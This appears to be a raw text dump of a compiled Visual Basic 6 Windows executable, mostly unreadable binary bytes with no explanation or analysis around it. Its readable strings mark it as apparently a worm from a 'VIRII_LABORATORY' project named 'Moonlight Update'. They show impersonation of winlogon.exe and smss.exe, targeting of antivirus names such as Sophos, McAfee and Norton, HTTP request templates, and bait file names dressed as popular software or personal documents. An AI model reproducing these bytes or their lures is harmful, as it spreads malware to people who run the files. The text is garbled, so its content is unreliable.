w0Fv;6&
F z]`&
F/)#0uatn ZX
W3P/R(Y
^| $bm-$~
G"(_ZD9+@`W
/S_4D<Uu
.d6E+</M~st/EqPCIP!
2&XS^?14$Q>_)
x;?UVL
[+rR+3
'boty/SVM@
.LPB@Rj
hS_V,W2
.VMD;B
SZ-~6z
u+*F0z
jdHMI}$D
2`A@lx{81\
8n/s2#~
<QVKTc
08ctM'
0W&8V/tO
s8Eia9V$
F N@PG
<TZdqCMR ]}6">4
ZDyBU>%D$#VvH)
yjlXX3
@whR_F
*ZSDfF7V
C^2%Mc%7
G O@vC
P#}a'3
VWWhQ<^_ I
P0|'<_
T;$]&ft2}
TROENa!y
g4PLF$w eyN
|ChG.]
oqug>DR
SX3K0$.
Qtwo*bGpH
Qf7@E.%2)9@H
$7DB3,,J
Sp22[t7
\`2222dhlpY5t\
EFf#3d#
8CWSXu
`'iZrA%
Spf<dH.-d
Gzk"k<E
8)[zgNy
MD=JaH
Buj=
CMUQnERpq
|RA|qlt%4NPV
LXp6(PpU
qb@.WW(@
tC]*><R
Fl=Ku|>;u(96u g8
\tH`gcdh
hA9]tF
8_D<|
+:Pt`;:u
XR;5vr
^}i'Et
e9""$GT*r
d>sVySOC\
`tt,Q\UVu|u7up
z2hu`[
9u]XS-b
bz=i5u1jt%_
{Np?tt3/
OH&EgXj
U;+O`4
`SuwC]]
vC](_,
Z]_Q>(5
0PEG(Xw
'/uLQj
Jc!tI4l
8q0NU<
p?LbR,P
L!.X yl
s<tF @F@*;g
('~\7JFcW}G\
2$N|X#8Q
R3DOEPk
rF8'|#HDE5
>_4X7Q(E
(*H&>6Ch
Q8qG>`URWG0t~uIME"
B9huc$,9CG!|)`
PHx$L5+
w) ]ps
L]rewTVA0
VJ=l6B
u[3R"E
t0{U6kx
{>EzDRW
_=kn.r
4Ci.Ajk4:
}Y`\a0W_Z{)Q#H
;^#bB}M
76j$7r7$ma7
9uS]oq
"W@9 <*
^/H(i[
5ZF!{WA`9C
yL^Im2
`P$ BD,V
c=G`B
g@a;NL`
8 g" :c
@W@?5yt
QInMa
09(|$`
P;/hu21
[)]3mb
Sx&i/_
<+C(*8
)eHP;/
B(.iU`'IGS4
&:+iC)
9t8Zk$
+90/P5T
iu2;=&.4
X95<qHDUQ;~{`MEg
-.8G^ w
(g>K<L
{V@C3G{
-uV"-#T,v
s/ 8/14z
zEl+c{l)J&2Y0(
"#'&8!
XopL=}IlfS&['gYlL3Y%$f
G0d+0p
M ,b%*^4J+++
H{+v:lt(X"#U
/4Ra#C
jeO,3P
/.@;ipD/
D8wg.KA
'lCU4j
'0?f;M
9,l<wc
=(0tcQ
F8)x(,I
675"4g
ha5$y0./@#-,
c?*PA/a
(hKJf(MY7dLY*Q
9ePON!Ye0UTS
owF)? ,o(4@:
?q\$DD
!?Iv4;5Ns
VZ>RtLBL,3L<C\./-,H
\MVOiz
j?!6)@
s[E:^M,CB'#iED
RnB*^E
V:SZw}AS%
U33[Es
e~_[ k5}@uJ8
!<=gH;:u A
bX%-Jz(LKu
,+g4t@
PRSZo[ah
r|Rtn'
^AL_87GZ;
p8;-5rcs
xGH`EaV;SF
HPqQx8C;
NHNQ+,
-]t!PH
1^(fx+]t
1huL3&
p!N64g
utE~@;t;Q
4_UVb6
DaK2=O
]TD+Hm
| 5WV $
.V)3*+a
n0{W}0
I444W!4_N,
,PQA U
r!'$D$
]pv!VSK'
V4V8q]\US]j&
XG ywV<5R01
)aGm\Hxft
Je5)(DWI
~b~H=E
HM__G5ta
{u _v
>S^<;[t
GQYh2K
n]+Vgw"
YgK^^Pt
EN{dSj/n,
EMc)9"8PA#
$U/8r8?
PXR$ Z
nQ-$/PR4(
X^w[L!
#&'$;vE
Z/6A\4
{^0kF<PQ
D<O4.v
}# BA<'Q
HUc`n;X
j@Ap/PI
#])3<3{N
xuL9E/(ct
f:z<Rf9
%#pt!\
Y@kp@,
{iNw&7
'h!5WyCU
xw(m|pA
s\=::T
?JD"l)!rYnH:t0<;t,c#B
SRs0&w
bAimUT
1VCljQiB
dJwK6"(
"~M$pN
Q(|.@-
Yu!a={561
m AXx|
+d$TY_63s ]
=#E;S2
P)B;Bei
[=Y5M]|pk}kQc
m=P$Mu
Md74X^7|F
4L7C`;
mmd071GZ3
u-V?Ywu
'O[^_WxhN
[xW8jAOdA
yW,3;tj
:td9T^
}HMV%~2
M</+'@kw/,2< }
y~+;v#W}
,_{$QaN
_]'}E8$(;t
OOu.u!OOu
}9Ji+=
=D_)Ow
GF 7\(m)jY
~ jYHOgVE
2$]Ou|
2~|h}}^(
h%bptcO)
O(x >w"HY
at4H']#
^9zs/r
+;#|r>M)Ag
[O7*u#;
+PSM/ K6T7)
ERu^_[B8
Ci8t'tn
PiB!2#`
)\`kbP;F7?Lt>S6,
WG]1S(i
jzI./.
S?uo!K
GIt%[[)?u[:Q
m:/KuJ
]"tl0]U
uD~Eu#j
N|Vw/!
WsCx<K
Su q4s
v/VET1uI\
Oo[ICH9O;
^`=GZnw
PS[*j
R5.p(v8S
-Q==SLp
Bufa30t^K
usU\+s
1U33gjI;7f
m1%/>+
Bu?Y9(
a;YY4Hu10
u'$(+@g{^J
TVQLff
_,9Da W
[iYp \X
gVYHzBoW
H-&j"Y
0tkJzO+aW]{
z!>;!:=/
_l /7G6Y=Z1$
_9}E(wFI=
Fz]hQ;
4.@J\Wg
:|%jrE3v#
~|-][u
.LY3;W&>
Mt"$VSb
yt`!u
j]Wc}Y
)YOkm~%
pk%O=e
@}Y.tTP|y
,B_t=P#
1B6,u$
9$IHO@
D~;s#9
1M8;>G
!M1+F5R
oa=\cj
&(tMj)^#
mOftM
@A9)P-'6
uxtsO`
}8_&K:
8$8EL>
h%xCKh
S}V$'O<
j7xs!_W{
}7%A-$lxjAr6
7)j],IAi;=|D
\T*TuA>"u>M
x,' E0
|)QGJq
&{tM!9
Nw45Ds^. y
Oq7W3:@
x}(WEa u?;
#f8MZu
E,O}-vK<hF
zJ}>j,
BOg=wYqp
xi kC Heg-f
|&7]['x
P$"hF6
j?ZwqKKiL s
!y!JA=\4{
0]i]p&+u"
p;Ao";tcLq{q@
u&21 K=v-9o>
y'^bQ\o
SQ?ev?,{
#xieRC%
Q+ QH"
Klx_%
D;#~W#
3uYHy6s|s
6_5hmot
J'k(-U
^C8EZ_#
tE3Lu_
JCJnxa
O^E|8a#\D
Sl1Y]E
})OKt"
u^:<iN]
WqANCoiD
p w<GH
_$l8kO
__iEH+
O1/_HK
KYK,YY\
FKm\3HgS
98u61CO
J#JE1H&=I
atv@e9
W~0B&Y`
|?3?ru9A
-DxNt/
m}DmBv
u&GA Z
;r Oi3>
F'O?h4~
uVMV?p
41-)Y1T
^;P$|CFsN\
9Ui7{U
4V\1q1
)Er4As~
~q`se&
uB:wEi
;w+Cv'Ws
iltj7]a0 |"
X_p??.;$t(v
R=XP/YQ
VC20XC00x
arctEV`u5kaT
NNhravM
F080$mb@
7H"O} a}9X
U|M (Jz (Pk(8H.w
I5) FG_
k<fV[w(Z
k-'EJ+
PSj? eni,jhWq[)
:62`?I
rdvzq0
+02/%?4,^\
+(# >F6OPdl8
i:uN[kcg
;WB=W?
,;}scAfA
0UU;P79L
=;|A%#2QH
iDt03Pax}
1G#GhO@S
@QI$HU
a E1\"?s8
H1KG`U
[R6.nE
<w(*Dp
2H8:<Px;
btHHt.
@C=u.xiQ-
0Aj{;t7pu!Y`7.
[8n:$7, O<pO
X^:nbfU^
}O{Z}@P
DQ6H]a$Gr
S#+%0{ s4#%v(!{
@DjaP=!V|
h1G6xQ
_u]}_9c_,b
`32&>|e
%,M+MZ
@giR+ia"H|
maw\EOw
+(Utbj
^9u0/0A7
TLD<44
,DDM4MB4
-R 4c9
iC'oI9
W KWtE!)
1$!&n2[)V98C
H_SFZu
Xk|Msr/
#Y )Sm
A6u$UW
x-DCeN
FtTILu7}%}E6u,
49u#{e
'E"mht
@3N}[q
S<Ct}q
3~ nt(
5W$K}+av
-A~m{`O
NMOSe|L-Gm}
ufQ\E6
E!aHqv
&R8k~J
kb{0sE
\uskj0[*
xD{3|]u
]t_G<kAY
:o:w!e
jsEXPaX
(xuO)!
$By]+A
5SuMF$
O;+YpA%N
EW3>'0P
A/Nb ;
9U. |
GeY) 3+t;-
GGN 31
mv1,hn@g
[eZih#X/
Z"xtCk
fm0~BZ
Y@mHPZg
r$GEPNA
Z9/}}2
(tuYUA
Lt3{Y`,E
0YH:)gu
Q6;.{IA|Y
'Td<+3q(t
to$AvMI+z
5/6 YLz
uYAzt!
@*7 w%
IDJ}90
Lg3MP*=Y|!
*hM4v6}
SYf}~!
Pm?K::D
AcQ9f:P.A,
b.ba4p.V
[qI66F
- *7!$+(!,&d,-0.
0L2!8D<,GE@F2!DGHH,GLLIPJ2!
TKXGLL\M`!
,NdOL2h8l9
,Gp:t;L2!x<|wB=OBF
>&?F&dd@AL
L)U$K ' +
3Fh;L+v
8<l'%@D
2HLP C0TX
2 ptx$|
14;^t>)
=[qHt#
'{W!8HA1@
gE_YK\
,0O&uK$}<;
+k+G,*l#s!-tpG3kP
*T+Uw ,V@D-$
~/VjSe0
#"{E#4M0
x2kbZZ~
k@?PP02
~,8]t'i
d-J%f
CA$&x&.!0AD11#\L/
.s) :-`
DL>{,N
PHl%+hsOM
Nx@;EVhfH
N02`C~5Ph
]*|C`?%
\nz4<V7q
N>OJGA~Z)^9
vmhg.}k"Y$
A"=:P1_
g @gEjxia)7f%
t@:P}_A##
tOSO|i;+SB;t9&x"Wkt
iZP@Mt14,
u(k}J5j[
@@=|ll
;#pC;+
,a9Fv((
}_uk,m
sZ~a^z@h
UO87aA!"J
}PSP;g
1A# H}F*
Pe y`
Ud`^cMF
\=8 t9
U%YE?"kk
7{!U]:h>S$D
_SOHSk
7?8"utD
w_F9C=
wefXVB
\FcR A
-SU*h[
Bzt!(d
4/t2jFN#9U
gO]JCAlr
Nct<At
z\up:PA*!h[
uX^A|V
pB<v)3P|
6Oa@7_&
($]0t WFM
j,iO[o2
fPC t_h
!WNPNP
$,4G;A
_u@WPW
eo?[7'9]
y3]9}C u
AEAj )QB
r"=8]t
2;z1as2
)W5ppy
M1-5w-
Op[R?j
_0B=2|V<
(D"=Gt,={!<z=w
@'vAAC
@=ewlrSqW`
RxT/S)tu
WU#;w
'BBB%_[jX[*rV,
YGm:V=ViFcK
%Kc 1ar
t&Uj=eY$[;t@I3;|
Hzt> k
8Z"'O@W%|C?
/o24<(
+mO@MS
[7.WwY+
#S@L|m
m]uAWx!>(P+,t
Ml^1]z3
VP YuRr
#7Ju*+}
XZbTBY
X5e!FCa
P+\3T*]"
*;(ggx_uM;Q?^SCbCtGWYE}
oOp7N<tk&^xuw
8fe{0sC
,0F>`!
G7sPkS
.'y3tU
G3~1>Mvu
lx;o]
'G8t,A<
t QQ@$
0VWj1bTL
g_Gl,WZRtP{y t
ICTH)Qub
$UpSMoE
cHS$U(
,uFWW-4
}<EX:6
?MM%;w[t2E
X<v/YT@
tE~C9M#
%,?J43;VVVd%%f:4
hu-VVg@t
5VVC"%Wi;
}WW^}%9
Xs988:p
oA*S^6V
0*Hh=-EU
RlqQ8U
ctWp .P)
& XN]]
=3 "KK
vBW!f)"
]"8+pE0q.+WW
.vmX*R
0,*!r[
CP%FpUIr7Cb{f*-X$~n=
RuaJ|[
sePdD.
PAP. fS
A'[/`QywE
wS8/kY
E3}+? 8X
Ku 0Hq
ig/&8**
vDt}l'
8D E$5yp:UPH';f"SW
+B:Q~48Yf<
i:pleSoD
0N?=>[xXI7~u,
A),dr+
7t0'Ht
L'%/S_
TT)9H$
tS>!J~a.uC
qlf;u fo-S
!\JU?x(7"DRi
i0P%^@
=tQ-\F60:u
e}Vtl_7NeW;
@0M-`E6
jHqA}
kdzbeO\
iLA`rqg
@l2u\E
a=-fAv
\cQkkbal
eLXaMY:t
jiCn4Fg
c;d>jm
i]Wbgeq6l
8ROggW
A`Ugn1yiFa
fo%6hRw
[&wowG
eibkal
`MGiIwn>Jj
)WTg#.zfJa
h]+o*7
l/@LC_TIME
MONETARYCTYPEZ
OLLKnATEA
__GLOBe_HEAP_SELEEDn-`SVCRT/`CnMonTueWedThuFriSat5nFebMarApr
lAugSe
pOctNovDec~TZUv
PX (y8PX
])d n]l
Paggu&Uru
Ar1ntinaHPe_VColombi$
D+Qic; R
outh Afr.^m
Luxe9stagCSwitz
tIaCnd>p
i.s- 5dOra&rU)EnglxfF'"GOn/B?Mgium
Mexo/asq
Tcu{`;Y_ -7
kqg'm h#dk & tob
UvakGg<o-,k-'i+
ew-ahggmV*
bte;/ci
ksss-f
i'u? k '? X
D' n^Jmi
.d i{gW' s#
v' cIidgr7`fc/r'J['gGb]ivD a>
eMKzqOn/
sk'),1kO
'htsso5q
f'a|fL
k4-y7il/v
jG=irev-`ib+
aT`i7b
ttM[t'sa;0S'mpVV
:/MrrI
'wLOSS#
SING_?OMA%#R60U~28
- abl6m
a hpo.
GN7t.gqTNcGf\;
qao63<std5
rW+CgKcF c
opecU27
cW82<nIc3
Y_lock
AuAm_0xK9!UmH!
\V8</{
uPsV2f'
tup{"MdM[b
sf+VcTC++ R
7H:myd
, Mn k
AH{bp{
t)q15R
ne}ic0v
ny~vfG
vn^NfF>]
~3GetLaA?!Popup& Wi
ageBoxA
C =32.d
cmdM<exe/\
jHNhUKoc memory_*G zip l =t
\~ZDf5gC'y
z`d%Q[o{-b/$
uwmd7X
Orivgh-$^z
v*X~erboseunp#{.t
rqQuietnz9
Q'DOSNJk SF=
XozEnc
rNd^F8
Vi A?ffs
s0ptsq
zdB])U[
29 19
-leJd:dull&J
t'oF--
cEy[wl
O;6Hdo!
AB6plxk_tupj[p
bi*lMtOn gic`fz
|SeSby3
Lm&Bb#
7>0Axy
sbvh09.]buff
:;,=+"[]<>| /
$At!oYx:\
\\^YfZ
zQtfE6
=u,GwM
->d%%v
vp T(ofXa}
NffmDZ#
Gw#!r+bV
urd,-f
GF-ABF
dbKGyk8&
ypwi)^d[d;U
AmNPce5&!
s.]05O
W--biP
eXGZtGI{%2d
eaph CJDG3%nc'=-f+
@ge,+xx
d$ h2nbx\
9if;b
Rv%F`>O
-daX xgbu mdo
hh8A,[
[a%s:R(
#USqFt!
run, F+ 6eM
o-gV,y
Sx,15,H~!!X:`F?McK
[W]%XQ
e-u--=
02x, .X
k@:!IX=^z
UyZsd@&
%byaA;(
kK~sitb) !=QBj9qla3
_u0x4xN
\x fqg`P,w-HI
Eype(Qm( .WTb
3VHI>X
`85: F
o5fd%n
p?|rQK\
FC,iMz
3~l&$a
65 AC6l
Yl/mV lip
4Z,2 Xu<0
F00e=7!
g:YwM4M
x_p40a
y bFIN
>1dSVESWE 22-2EUQ4
-MVMEX
c07xDEApALUT
9h2%EN\S
"X`_DN`
W_C<CA
0GTMW+3S$CHE
W 20VV
\EN$4O?COL(8s%
RPER,J
HcSARG
030FECU9J44L
CHL88+sYURY<cZ@ZP/~
GBRC HNCZE.
|NLDHKGNZLa
|PRItSVKdNXKOl dH <(TTO
ZHHI.CHS
a p?\T
BYYIJZYST G
\Ho8,mw/(
NPTBp^4+m
` P7<z
FEGYHMYNI|AhYYZXRDU4
\xLy<z
af50`y!O
_j2=Ws1~
<840,ii(
4MsM4Mi5^A
4MxldXL
4MHD<(
GetDriveTypeAM[^Lea
{RelseMuox
Wa=ForSoL[-ObjJ
)CloAH
eLdExch+g(t
2HpF#e
V4R!,l[rcmpi
u1PhNamn7
<To[3O+Loj
u'Curn%SC
vWidUr]`8
-l+e_-uqlm
K#hp0nlen_d+
8(TvIPTSae1n
S[E$-ZGWTewPUkdPi5PVmrDeCA[WrPoimOsh"Bj
fa LCI_D
W/-nB\:pa!A
Addrc
:T7eni
`;@`yL
89K}i#|l0Q1Op
6wvsptf
%.'$M{
;|-7CG
"9\akp
>EM+/@cB}d)O
) ]bq)!
-_.1%0g/"5F
\5=[]u
!V}r{4O
XS<1#*BW !
3|CDxA
v0lC 33
iF%HO0[
WN_7=Y[
3h%E1
C& 85<9
R+5>I(
:1+E%G
@.MOD
re4w]O!0
[dZSB>
KERNEL32.DLL
ADVAPI32.dll
USER32.dll
LoadLibraryA
GetProcAddress
OpenProcessToken
wvsprintfA
ZIP32.dll
ZpArchive
ZpGetOptions
ZpInit
ZpSetOptions
ZpVersion
5lJE@.F
:@HAm`A@
0`x9gx9@
5pJE@.F
:@HAp`A@
:cx>zx:@
2eTH@$2@
>e@>@0Ae@A@05@
@@$<x@<@0J`
5lJE@.F
C@HAm`A@
0`x9gx9@
5pJE@.F
:@HAp`A@
:\x>zx:@
C@p<pp<@
5lJE@.F
:@HAc`A@
0`x9gx9@
5pJE@.F
C@HAe`A@
:\x>zx:@
TH@$1@
JJ@.5@
>eHM@0>@
HQ@0:@
TR@$1@
HQ@0:@
A|HO@0M
TQ@$<@
qMzxM@
]Tp]@p@
5lJE@.F
=@HAm`A@
0`x9gx9@
5pJE@.F
C@HAp`A@
:\x>zx:@
<^xAex<@
Fyx:yxF@
__vbaVarSub
__vbaVarTstGt
__vbaStrI2
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaVarVargNofree
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaPut3
__vbaEnd
__vbaFreeVarList
_adj_fdiv_m64
__vbaPut4
__vbaFreeObjList
_adj_fprem1
__vbaRecAnsiToUni
__vbaVarCmpNe
__vbaStrCat
__vbaLsetFixstr
__vbaRecDestruct
__vbaSetSystemError
__vbaNameFile
__vbaHresultCheckObj
__vbaLenVar
_adj_fdiv_m32
__vbaVarXor
__vbaAryDestruct
__vbaVarIndexLoadRefLock
__vbaVarForInit
__vbaExitProc
__vbaObjSet
__vbaStrLike
__vbaOnError
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
__vbaVarIndexLoad
__vbaStrFixstr
__vbaVargVar
__vbaBoolVarNull
__vbaRefVarAry
_CIsin
__vbaErase
__vbaVarZero
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGet3
__vbaStrCmp
__vbaAryConstruct2
__vbaGet4
__vbaVarTstEq
__vbaPutOwner3
__vbaObjVar
DllFunctionCall
__vbaVarLateMemSt
__vbaVarOr
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
__vbaRecUniToAnsi
EVENT_SINK_Release
__vbaNew
_CIsqrt
__vbaVarAnd
EVENT_SINK_QueryInterface
__vbaStrUI1
__vbaVarMul
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaInStrVar
__vbaUbound
__vbaStrVarVal
__vbaGetOwner3
__vbaVarCat
__vbaI2Var
_CIlog
__vbaFileOpen
__vbaR8Str
__vbaVar2Vec
__vbaInStr
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaFreeStrList
_adj_fdivr_m32
__vbaPowerR8
_adj_fdiv_r
__vbaVarTstNe
__vbaVarSetVar
__vbaI4Var
__vbaVarCmpEq
__vbaAryLock
__vbaLateMemCall
__vbaVarAdd
__vbaStrToAnsi
__vbaVarDup
__vbaVarMod
__vbaFpI4
__vbaVarLateMemCallLd
__vbaVarCopy
__vbaRecDestructAnsi
__vbaVarSetObjAddref
__vbaLateMemCallLd
__vbaR8IntI2
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
_CItan
__vbaUI1Var
__vbaAryUnlock
__vbaVarForNext
_CIexp
__vbaI4ErrVar
__vbaFreeStr
__vbaFreeObj
`.data
R9N&Yk
I7$(CC
!F Hlv9
e%:gKhCy
3 dOidogL
G%Hotgai
O,O/imM
#1?aIA$
C70a4>N
KERNEL32ADV
APIiUS5
pLibra[
&Hk~ -
&SVers'
}7)nJK7MThd
n,5-Wh
&lbUhI
a7*nx4
gZV[EWiWhK
,G5\6,*
u1>xlH&[
%Kj;E4[
P+uffm[
`<<<<U
7P+vkm7RoU+J
>uaq<W
y|E<,;m}2
H@Ekm)lQC.)F0!5_CE.A09k
5@6'/n@@F6 y5.Ok
>@b5lJn.
_px=fC
9`xnBpv
Yx^X[<9
c4C2p`\p`!Gp
[,+n^([
Z("4[:
rn=&d6
>`T2`M
Af&>\+\k|
H+eT$5ee`>{
00T,8|
:O<9.2
<<>AO7
v>mo77+\$W7:T
4$y&7Kx@0`\
yVHpyCgye\CFxq4/
\@qT<TdA
qqgF<5 Tx:C
)99Q2)L
HsQy95[
2 llll
4`LLOeq&[
1^H1niF=V:<5
5qlw-/MvMN.d
p`$\73'E^MkY<`OO/3=TD
v/Avp[^
X:VEgr: al>Q@L`L`Z
p@+lpeeepeVgEx\
u1T1@qETX$+U2c(9
\1T@tM
e1Tp Xp 2pWWlBp
Wp=p$W%1T$iM
?Ug;<f
6QMM[#^Q~Qa!]6O0/l@
P9q8rphlH0n
`/$l2M6N
+6E+._Qby TTA*$RR@4-.QQ4mb.OO
G]9n0fX&
Q:.O=l(M=AO
ua>7'xy+0xOMK?L.Lp0K
g'@QA
JO7Jz]"> o@9
'>ONm@_>y+X/~
_0lzvA
[.VRt;)v
GZ|oH7x
M499;;,y
CGz8Gv<
QJfdv
#em'm^
rQ 6$mmm
LdLQ\ X
X5:6]T]
/^&1<u +V;
V+nV;WCo1B@ePC`
`>pBZsF$
MmheslFFX
M< 9{0d0<c<y1_T<4cX
T<d\QFF/2}
adj_fptan?4DIku
|[CAry
57div_nm64k
+m1B,J
b"3 5CV
u)ERQ
)@E}`rG?V
rq1Pn{w.0
A EVENT_SIN-K_
DFuna4
I%Ompac,
vqrudseJ
^x-$aoy[`
2-,Dj<
}ZeZ/d$K#%U
FUu?isj
dff,mxw"%
O.mtp^
+@Oad=c
GPGWHU
ddddddddddddd
IIIIIIIIIIIIIId7I
ttttttttj
<<<<<<<T
1111111(o
Id7(1IIIIIIIIIIII
IIIII`
[fPFMlllll
[sTtpk_glllll
[wwwwnhGFlllll
[i>wTTTTTTTTwpNIMlll
[i)<<<<<<<<<<<<<<:nK_l
[i}<<<<<<<<<<<<<<<<<wl
[c*(((((((((((((((((wl
[>6cj0
"' 6Hx
.LjR=W
.Jbjx=l
[[[[[Y
[[[[[[
[[[[[[[
[q~b[Fllll
[c}ha[]dlll
[f}nKB\`lll
[f}ttttttttttnKG[llll
[@SStha[llll
[XwwwwwwwwwwwwwwSSSTTpNJBllll
[SSSSSSSSSSSSSSTTTTTTTTT:kK^l
[<<<<<<<<<<<<<<<<<<<<<<<<<<u9l
[A><<<<<<<<<<<<<<<<<<<<<<<<<<l
[V211111111111111111111111111l
[2(((((((((((((((((((((((((([l
[|%##########################Kl
[*'5[Dj{
"'/5H[DPY
! 6J[[Lj=
! 6J[[DDDDl
-Yjoz{
[[[[[jxzW
[[[[[[[[
[[[[[[[[7
KERNEL32.DLL
MSVBVM60.DLL
LoadLibraryA
GetProcAddress
ExitProcess
MSVBVM60.DLL
__vbaVarSub
__vbaVarTstGt
__vbaStrI2
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaVarVargNofree
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaPut3
__vbaEnd
__vbaFreeVarList
_adj_fdiv_m64
__vbaPut4
__vbaFreeObjList
_adj_fprem1
__vbaRecAnsiToUni
__vbaVarCmpNe
__vbaStrCat
__vbaLsetFixstr
__vbaRecDestruct
__vbaSetSystemError
__vbaNameFile
__vbaHresultCheckObj
__vbaLenVar
_adj_fdiv_m32
__vbaVarXor
__vbaAryDestruct
__vbaVarIndexLoadRefLock
__vbaVarForInit
__vbaExitProc
__vbaObjSet
__vbaStrLike
__vbaOnError
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
__vbaVarIndexLoad
__vbaStrFixstr
__vbaVargVar
__vbaBoolVarNull
__vbaRefVarAry
_CIsin
__vbaErase
__vbaVarZero
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGet3
__vbaStrCmp
__vbaAryConstruct2
__vbaGet4
__vbaVarTstEq
__vbaPutOwner3
__vbaObjVar
DllFunctionCall
__vbaVarLateMemSt
__vbaVarOr
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
__vbaRecUniToAnsi
EVENT_SINK_Release
__vbaNew
_CIsqrt
__vbaVarAnd
EVENT_SINK_QueryInterface
__vbaStrUI1
__vbaVarMul
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaInStrVar
__vbaUbound
__vbaStrVarVal
__vbaGetOwner3
__vbaVarCat
__vbaI2Var
_CIlog
__vbaFileOpen
__vbaR8Str
__vbaVar2Vec
__vbaInStr
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaFreeStrList
_adj_fdivr_m32
__vbaPowerR8
_adj_fdiv_r
__vbaVarTstNe
__vbaVarSetVar
__vbaI4Var
__vbaVarCmpEq
__vbaAryLock
__vbaLateMemCall
__vbaVarAdd
__vbaStrToAnsi
__vbaVarDup
__vbaVarMod
__vbaFpI4
__vbaVarLateMemCallLd
__vbaVarCopy
__vbaRecDestructAnsi
__vbaVarSetObjAddref
__vbaLateMemCallLd
__vbaR8IntI2
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
_CItan
__vbaUI1Var
__vbaAryUnlock
__vbaVarForNext
_CIexp
__vbaI4ErrVar
__vbaFreeStr
__vbaFreeObj
@�@�@�@�@�@�
@�@�@�@�@�@�@�@�
@�@�@�@�@�@�
@�@�@�@�@�@�@�
@�@�@�@�@�@�
A�A�A�A�A�A�A�
B�B�B�B�B�B�B�
B�B�B�B�B�B�B�
B�B�B�B�B�B�B�B�B�
B�B�B�B�B�B�B�
B�B�B�B�B�B�B�
B�B�B�B�B�B�
B�B�B�B�B�B�B�B�
B�B�B�B�B�B�B�B�
)�1�1�R�Z�c�k�{�{�
!�)�)�!�9�1�J�R�Z�s�{�
y�!�)�!�1�1�9�B�
y�B�J�J�Z�R�
}�Z�k�k�c�s�k�s�{�
!�)�B�R�R�c�Z�c�s�k�{�
)�1�1�R�Z�c�k�{�{�
!�)�)�!�9�1�J�R�Z�s�{�
y�!�)�!�1�1�9�B�
y�B�J�J�Z�R�
}�Z�k�k�c�s�k�s�{�
!�)�B�R�R�c�Z�c�s�k�{�
)�1�1�R�Z�c�k�{�{�
!�)�)�!�9�1�J�R�Z�s�{�
y�!�)�!�1�1�9�B�
y�B�J�J�Z�R�
}�Z�k�k�c�s�k�s�{�
!�)�B�R�R�c�Z�c�s�k�{�
@�O�L�D�E�R�.�e�x�e�
@�O�L�D�E�R�.�e�x�e�
C�*�\�A�D�:�\�D�a�t�a�H�e�l�l�S�p�a�w�n�\�W�A�R�I�N�G�_�V�I�R�I�I�_�L�A�B�O�R�A�T�O�R�Y�\�V�i�r�u�s� �K�u�\�M�o�o�n�l�i�g�h�t� �U�p�d�a�t�e� �B�a�r�u�\�P�r�o�j�e�c�t�1�.�v�b�p�
w�i�n�l�o�g�o�n�.�e�x�e�
s�o�p�h�o�s�
m�c�a�f�e�e�
n�o�r�t�o�n�
s�e�c�u�r�i�t�y�
d�`�j�{�f�z�f�o�}�
z�|�y�f�{�}�
D�f�f�g�D�h�`�e�
p�f�|�{�z�`�}�l�
p�f�|�{�m�f�d�h�`�g�
n�o�r�m�a�n�
v�a�k�s�i�n�
n�o�v�e�l�l�
G�f�{�d�h�g�)�G�C�l�l�
G�f�{�d�h�g�)�S�h�g�m�h�
G�e�t�F�i�l�e�
\�M�Y�p�I�C�.�z�i�p�
G�E�T� �/� �H�T�T�P�/�1�.�1� �
H�o�s�t�:� �
F�r�i�e�n�d�s�t�e�r�
h�o�t�m�a�i�l�
\�6�4�e�n�c�.�e�n�
O�p�e�n�A�s�T�e�x�t�S�t�r�e�a�m�
R�e�a�d�A�l�l�
R�e�a�d�L�i�n�e�
A�B�C�D�E�F�G�H�I�J�K�L�M�N�O�P�Q�R�S�T�U�V�W�X�Y�Z�1�2�3�4�5�6�7�8�9�0�-�.�_�
R�e�a�l�P�l�a�y�e�r�1�3�-�5�G�O�L�D�.�e�x�e�
I�c�o�n� �C�o�o�l�-�E�d�i�t�o�r� �3�.�4�.�3�0�3�1�5�.�e�x�e�
C�h�e�a�t�E�n�g�i�n�e�5�2�.�e�x�e�
f�r�a�m�e�w�o�r�k�-�4�.�4�.�e�x�e�
V�i�s�t�a� �T�r�a�n�s�f�o�r�m�a�t�i�o�n� �P�a�c�k� �4�.�0�.�e�x�e�
P�a�c�k�_�V�i�s�t�a�_�I�n�s�p�i�r�a�t�_�1�.�6�.�e�x�e�
D�e�e�p�U�n�f�r�e�e�z�e�r�U�1�.�6�.�e�x�e�
P�a�c�k�_�L�o�n�g�h�o�r�n�_�I�n�s�p�i�r�a�t�_�1�.�6�_�c�o�d�e�3�2�5�4�7�.�e�x�e�
T�e�a�m�V�i�e�w�e�r�_�S�e�t�u�p�.�e�x�e�
L�i�c�e�n�c�e�.�e�x�e�
P�i�c�t�u�r�e�s�.�e�x�e�
S�e�c�r�e�t�.�e�x�e�
D�o�c�u�m�e�n�t�s�.�e�x�e�
V�i�v�i�d�.�e�x�e�
u�p�d�a�t�e�.�e�x�e�
X�X�X�.�e�x�e�
c�o�o�l�.�e�x�e�
v�i�t�a�e�.�e�x�e�
e�r�r�o�r�.�e�x�e�
@�g�h�t� �U�p�d�a�
e�x�p�l�o�r�e�
r�e�g�e�d�i�t�
\�c�y�p�r�e�g�.�d�l�l�
s�e�r�v�i�c�e�.�e�x�e�
s�m�s�s�.�e�x�e�
s�y�s�t�e�m�
